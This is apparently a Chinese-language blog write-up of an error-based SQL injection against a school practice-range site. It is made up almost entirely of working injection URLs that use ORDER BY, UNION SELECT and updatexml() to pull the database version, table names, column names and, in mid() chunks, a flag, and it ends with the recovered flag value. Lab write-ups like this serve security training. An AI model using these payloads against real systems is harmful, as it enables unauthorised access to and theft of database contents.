记一次报错注入的学校靶场

2022-09-20 14:17:24 浏览数 (2)

闭合

代码语言:javascript复制
http://47.103.94.191:8034/show.php?id=33-- 

查列数

代码语言:javascript复制
http://47.103.94.191:8034/show.php
?id=33 order by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- 

查看回显

代码语言:javascript复制
http://47.103.94.191:8034/show.php
?id=333 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- 

查看数据库名字、版本

代码语言:javascript复制
http://47.103.94.191:8034/show.php
?id=33 and updatexml(1,concat(0x7e,version(),0x7e,database(),0x7e),2)-- 

查看表名(这里对输出的个数有限制,因此使用limit进行限制)

代码语言:javascript复制
http://47.103.94.191:8034/show.php
?id=33 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='cms' limit 8,1),0x7e),2)-- 

查看列名

代码语言:javascript复制
http://47.103.94.191:8034/show.php
?id=33 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='cms' and table_name='this_is_flag' limit 1,1),0x7e),2)-- 

查看数据(这里由于flag太长了,无法一次显示,因此使用mid进行截断)

首先查看下flag的长度

代码语言:javascript复制
http://47.103.94.191:8034/show.php
?id=33 and updatexml(1,concat(0x7e,(select length(flag) from cms.this_is_flag),0x7e),2)-- 
代码语言:javascript复制
http://47.103.94.191:8034/show.php
?id=33 and updatexml(1,concat(0x7e,(select mid(flag,1,10) from cms.this_is_flag),0x7e),2)-- 
http://47.103.94.191:8034/show.php
?id=33 and updatexml(1,concat(0x7e,(select mid(flag,11,20) from cms.this_is_flag),0x7e),2)-- 
http://47.103.94.191:8034/show.php
?id=33 and updatexml(1,concat(0x7e,(select mid(flag,21,30) from cms.this_is_flag),0x7e),2)-- 

flag

代码语言:javascript复制
flag{16aeb3e6d73689bf456c5c50f2d04b84}

0 人点赞